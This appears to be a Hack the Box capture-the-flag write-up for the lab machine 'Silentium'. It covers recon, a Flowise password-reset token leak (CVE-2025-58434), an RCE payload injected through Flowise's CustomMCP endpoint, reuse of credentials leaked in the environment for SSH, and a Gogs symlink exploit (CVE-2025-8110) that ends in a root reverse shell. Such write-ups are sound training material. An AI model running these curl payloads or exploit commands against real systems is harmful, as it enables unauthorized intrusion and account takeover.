CyberSaif
← All write-ups
Hack the Box / Easy

HTB: Silentium

Tracing an unchecked input from a friendly crash to controlled instruction flow.

Scope

IP Address Hostname
10.129.245.103 silentium.htb
10.129.245.103 staging.silentium.htb
10.129.245.103 staging-v2-code.dev.silentium.htb

Nmap

We’ll start with an nmap scan to identify running services on the server.

As you can see, we only have ports 80 and 22 open.

┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 10.129.245.103
Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-19 21:22 -0700
Nmap scan report for silentium.htb (10.129.245.103)
Host is up (0.092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 595.51 seconds

Landing Page

By accessing port 80 on http://10.129.245.103:80 we can see the website they are running.

While scrolling, it appears that these people work here, hence, they might have some sort of access to the server.

webpage

Right now, there is nothing much on the website. Therefore, we’ll discover virtual hosts on the server, and for that, add the silentium.htb 10.128.245.103 in your /etc/hosts file.

Gobuster

Gobuster scan shows that there is a staging host running.

┌──(root㉿kali)-[/home/kali]
└─# gobuster vhost -u http://silentium.htb -w /usr/share/seclists/Discovery/DNS/combined_subdomains.txt --append-domain -t 250 --timeout 20s
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       http://silentium.htb
[+] Method:                    GET
[+] Threads:                   250
[+] Wordlist:                  /usr/share/seclists/Discovery/DNS/combined_subdomains.txt
[+] User Agent:                gobuster/3.8.2
[+] Timeout:                   20s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
#pop3.silentium.htb Status: 400 [Size: 166]
#www.silentium.htb Status: 400 [Size: 166]
#mail.silentium.htb Status: 400 [Size: 166]
#smtp.silentium.htb Status: 400 [Size: 166]
**staging.silentium.htb Status: 200 [Size: 3142]**
Progress: 653920 / 653920 (100.00%)
===============================================================
Finished
===============================================================

Add this new subdomain to the /etc/hosts file.

#/etc/hosts
127.0.0.1   localhost
::1         localhost
<ip>        silentium.htb staging.silentium.htb

Flowise AI

Accessing the staging.silentium.htb reveals that it is running Flowise AI, which requires authentication.

Initial Access

CVE-2025-58434

This version is prone to a vulnerability that leaks users’ sensitive information, including User ID, email, hashed password, and a temporary token when a forgot-password request is made. The exposed token can be used to reset user passwords on the reset-password page.

Earlier on the landing page, these users were listed: Ben, Marcus, and Elena.

Therefore, we can try these names to see if they have access.

Username: ben@silentium.htb works

curl -i -X POST http://staging.silentium.htb/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"ben@silentium.htb"}}'
#Response
{"user":{"id":"e26c9d6c-678c-4c10-9e36-01813e8fea73","name":"admin","email":"ben@silentium.htb","credential":"$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG","tempToken":"61cpbEwCQZoTPoq8riQLGZZssFK0006ov9E9FRZVqjtaFGQsXVkSLXt0gq6SQGIy","tokenExpiry":"2026-05-15T00:36:22.459Z","status":"active","createdDate":"2026-01-29T20:14:57.000Z","updatedDate":"2026-05-15T00:21:22.000Z","createdBy":"e26c9d6c-678c-4c10-9e36-01813e8fea73","updatedBy":"e26c9d6c-678c-4c10-9e36-01813e8fea73"},"organization":{},"organizationUser":{},"workspace":{},"workspaceUser":{},"role":{}}

The tempToken can be used on the http://staging.silentium.htb/reset-password page to reset Ben’s password.

After gaining access to the portal, the Flowise version can be checked. Version 3.0.5 is vulnerable to Remote Code Execution.

CVE-2025-59528

Vulnerability exists in the CustomMCP node that executes user-provided mcpServerConfig input via Function() without validation. This allows attackers to run arbitrary JavaScript with full Node.js privileges, enabling command execution and file system access. The flaw is triggered through the API endpoint /api/v1/node-load-method/customMCP.

You can either use cURL or a script from Exploit DB to gain initial access.

cURL

Source: GitHub

curl -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q" \
  -d '{
    "loadMethod": "listActions",
    "inputs": {
      "mcpServerConfig": "({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"echo !!RCE-OK!! >/tmp/RCE.txt\");return 1;})()})"
    }
  }'

Script

Source: ExploitDB

Start the listener before executing the script.

nc -lvnp <port>
Listening on 0.0.0.0 <port>

User Access

After gaining initial access, let’s view the environment variables. In the result below, we can see that there is an SMTP configuration here for the user Ben. We can try to establish an SSH connection using the following credentials: ben@silentium.htb:r04D!!_R4ge

/ # env
FLOWISE_PASSWORD=F1l3_d0ck3r
ALLOW_UNAUTHORIZED_CERTS=true
NODE_VERSION=20.19.4
HOSTNAME=c78c3cceb7ba
YARN_VERSION=1.22.22
SMTP_PORT=1025
SHLVL=3
PORT=3000
HOME=/root
OLDPWD=/home
SENDER_EMAIL=ben@silentium.htb
PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium-browser
JWT_ISSUER=ISSUER
JWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
LLM_PROVIDER=nvidia-nim
SMTP_USERNAME=test
SMTP_SECURE=false
JWT_REFRESH_TOKEN_EXPIRY_IN_MINUTES=43200
FLOWISE_USERNAME=ben
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DATABASE_PATH=/root/.flowise
JWT_TOKEN_EXPIRY_IN_MINUTES=360
JWT_AUDIENCE=AUDIENCE
SECRETKEY_PATH=/root/.flowise
PWD=/
SMTP_PASSWORD=r04D!!_R4ge
NVIDIA_NIM_LLM_MODE=managed
SMTP_HOST=mailhog
JWT_REFRESH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
SMTP_USER=test
/ #

The above credentials work and we have user access on the machine.

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# ssh ben@silentium.htb
ben@silentium.htb's password:
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-107-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
<truncated>

ben@silentium:~$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben),100(users)
ben@silentium:~$ ls
user.txt
ben@silentium:~$ cat user.txt
62d******************b815
ben@silentium:~$

Privilege Escalation

After gaining user access, let’s see what services are running on the system.

ben@silentium:~$ ss -tulnp
Netid                State                 Recv-Q                Send-Q                                Local Address:Port                                  Peer Address:Port                Process
udp                  UNCONN                0                     0                                        127.0.0.54:53                                         0.0.0.0:*
udp                  UNCONN                0                     0                                     127.0.0.53%lo:53                                         0.0.0.0:*
udp                  UNCONN                0                     0                                           0.0.0.0:68                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:8025                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:1025                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                     127.0.0.54:53                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:39459                                      0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:3000                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                      127.0.0.1:3001                                       0.0.0.0:*
tcp                  LISTEN                0                     4096                                  127.0.0.53%lo:53                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                        0.0.0.0:22                                         0.0.0.0:*
tcp                  LISTEN                0                     511                                         0.0.0.0:80                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                           [::]:22                                            [::]:*
tcp                  LISTEN                0                     511                                            [::]:80                                            [::]:*
ben@silentium:~$

Gogs

After going through all of the running services, I found that the server is running Gogs on port 3001 .

Gogs is a lightweight, open-source, self-hosted Git service that lets you host and manage your own Git repositories, similar to GitHub or GitLab, on your own server (Gogs, 2026).

Let’s forward the port to access the port 3001 on local machine.

The same service can also be accessed on **staging-v2-code.dev.silentium.htb (**ensure to add the vhost in you /etc/hosts/ file)

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# ssh -L 3001:127.0.0.1:3001 ben@silentium.htb

On the page, we have an option to create an account. Let’s do that. After creating an account, go to settings and generate a token key. Store it somewhere, you’ll need it later for privilege escalation.

webpage

CVE-2025-8110

A quick Google search shows that there is a zero-day vulnerability which is being exploited in the wild. Let’s attempt to test that exploit against Gogs.

This is a path-traversal/symlink vulnerability in Gogs that can let an authenticated user escape a repository’s directory and potentially execute code on the server, in our case, the Silentium machine.

To read the full article, refer to https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit

For privilege escalation, I’ll use the following script to exploit the vulnerability.

https://github.com/TYehan/CVE-2025-8110-Gogs-RCE-Exploit

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# python3 exploit.py -u http://127.0.0.1:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 6565

Root Flag

┌──(root㉿kali)-[~/HTB-BOX/Silentium]
└─# nc -lvnp 6565
listening on [any] 6565
connect to [10.10.15.93] from (UNKNOWN) [10.129.16.24] 33502
bash: cannot set terminal process group (1494): Inappropriate ioctl for device
bash: no job control in this shell
root@silentium:/opt/gogs/gogs/data/tmp/local-repo/1# ls
malicious_link
README.md
root@silentium:/opt/gogs/gogs/data/tmp/local-repo/1# cd ~
root@silentium:~#ls
gogs-repositories  root.txt
root@silentium:~#cat root.txt
33a**************2a

Resources

CVE-2025-58434 - Forgot Password tempToken

CVE-2025-59528 - CustomMCP Vulnerability

CVE-2025-8110 - Gogs Symlink Vulnerability